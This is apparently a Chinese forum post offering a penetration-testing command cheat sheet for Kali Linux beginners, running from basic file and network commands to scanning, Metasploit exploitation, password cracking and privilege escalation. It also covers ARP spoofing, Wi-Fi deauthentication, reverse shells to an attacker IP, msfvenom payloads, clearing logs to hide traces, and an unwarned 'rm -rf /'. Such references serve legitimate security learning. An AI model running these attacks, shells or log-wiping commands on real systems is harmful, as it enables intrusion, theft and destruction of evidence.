L7.首席
3624
0
504
面向 Linux 初学者和渗透测试入门者的实用命令手册。 涵盖从基础系统操作、文件管理、网络配置,到信息收集、端口扫描、漏洞利用、密码破解、本地提权、流量嗅探、无线渗透及痕迹清理等高频实战场景。
新手快速上手建议
命令 --help
man 命令
ip link
nmcli device
ls
ls -l
ls -a
.
..
ls -la
cd /
cd ..
cd ~
cd
cd -
pwd
mkdir test
test
mkdir -p /a/b/c
rm file
rm -f file
rm -r dir
rm -rf /
rm -rf /*
-r
-rf
rm -rf dir
cp file /tmp/
cp -r dir /tmp/
mv file /tmp/
mv oldname newname
touch newfile
chmod 777 file
chmod 644
chmod 755
chmod 755 file
chown root:root file
df -h
free -h
cat file
tac file
head file
head -n 20 file
tail file
tail -n 20 file
tail -f file
more file
less file
nano file
vim file
:wq
:q!
grep "keyword" file
grep -i "keyword" file
grep -r "keyword" dir
wc -l file
ifconfig
ip a
ip addr
ip addr add 192.168.1.100/24 dev eth0
-i any
nmcli
route -n
ip route
ping ip
ping -c 4 ip
ping -i 0.5 ip
netstat -tulnp
netstat -an
ss -tulnp
arp -a
arp -s ip mac
hostname
hostname newname
curl url
wget url
wget -O newname url
curl ifconfig.me
curl icanhazip.com
curl ip.sb
telnet ip port
uname -a
cat /etc/issue
cat /etc/os-release
whoami
who
w
last
ps -ef
ps aux
top
pstree
netstat -antp
find / -name "*.sh"
find /home -name ...
find / -perm -4000 -type f 2>/dev/null
arp-scan -l
arp-scan --localnet
fping -g 192.168.1.0/24
cat /etc/passwd
cat /etc/group
cat /var/log/auth.log
lsof -i:80
nmap ip
nmap -sn 192.168.1.0/24
nmap -p 80 ip
nmap -p 1-65535 ip
nmap -p 80,443,22 ip
nmap -sT ip
nmap -sS ip
nmap -sU ip
nmap -sV ip
nmap -O ip
nmap -A ip
nmap -T4 ip
nmap -oN result.txt ip
nmap -oX result.xml ip
nmap --script=vuln ip
nmap --script=brute ip
nmap -Pn ip
nmap -D RND:10 ip
masscan 192.168.1.0/24 -p 80,443
zenmap
msfconsole
msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS ip
set LHOST ip
set LPORT 4444
exploit
run
back
sessions -l
sessions -i 1
sessions -k 1
nessusd start
nessuscli scan --launch 123
hydra -l root -P pass.txt ssh://ip
-t 4
hydra -L user.txt -P pass.txt rdp://ip
hydra -l admin -P pass.txt http-get://ip
hydra -l admin -P pass.txt mysql://ip
john --wordlist=pass.txt passwd
john --show passwd
hashcat -m 0 hash.txt pass.txt
hashcat -m 1000 hash.txt pass.txt
crunch 6 8 0123456789 -o 6-8num.txt
crunch 8 8 abc123 -o 8char.txt
cewl url -w webpass.txt
medusa -u root -P pass.txt -h ip -M ssh
sqlmap -u url --forms
fcrackzip -D -p pass.txt test.zip
7z x test.zip -p123456
sudo -l
sudo su
su root
id
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -2000 2>/dev/null
chkrootkit
rkhunter --check
unshare -rm /bin/bash
cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash
./tmp/bash -p
ps aux | grep root
cat /proc/cmdline
lsmod
exploit-db
tcpdump -i any
tcpdump -i any -w cap.pcap
tcpdump -i any port 80
wireshark
tshark -i any
arpspoof -i any -t 192.168.1.100 192.168.1.1
driftnet -i any
urlsnarf -i any
dsniff -i any
ngrep -d any "password"
airmon-ng start wlan0
airmon-ng stop wlan0mon
airodump-ng wlan0mon
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w wifi wlan0mon
aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon
aircrack-ng -w pass.txt wifi-01.cap
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vV
wash -i wlan0mon
kismet
bully -i wlan0mon -b XX:XX:XX:XX:XX:XX
airmon-ng check kill
ssh root@ip
ssh -p 2222 root@ip
scp file root@ip:/tmp/
scp root@ip:/tmp/file ./
nc -lvnp 4444
nc ip 4444 -e /bin/bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 你的IP 4444 >/tmp/f 如果目标是 ncat(非 Kali 默认),可使用 -e 或: ncat -l -p 4444 --sh-exec /bin/bash
nc ip 4444 -e cmd.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的IP LPORT=4444 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=4444 -f exe > shell.exe
chmod +x shell.elf; ./shell.elf
objdump -d file.elf
readelf -a file.elf
ida64
radare2 file.elf
strings file.exe
history -c
rm ~/.bash_history
: > /var/log/auth.log
truncate -s 0 /var/log/auth.log
: > /var/log/syslog
touch -t YYYYMMDDHHMM file
touch -d "2024-01-01 00:00" file
chmod +x file
./file
nc -zv ip 1-1000
nmap -p 1-1000 ip
sqlmap -u "http://target.com?id=1" --dump
dirb http://target.com
dirsearch -u http://target.com -e php,html
gobuster dir -u http://target.com -w wordlist.txt
whatweb url
nikto -h ip
metasploit-framework
xterm
screen
screen -r
reboot
shutdown -h now
最后提醒
这份速查表作为一份实用的技术文档,其内容会随着工具、系统和内核版本的更新而变化。建议定期查看 Kali 官网、各工具的 --help 或 man 页以获取最新、最准确的用法说明,保持知识的时效性。
--help
man
收藏0回复 显示全部楼层 举报
发表回复 回帖后跳转到最后一页
手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )
GMT+8, 2026-2-27 18:46 , Processed in 0.401487 second(s), 43 queries , Gzip On.
Powered by Discuz! X3.5
© 2025-2026 云栈社区.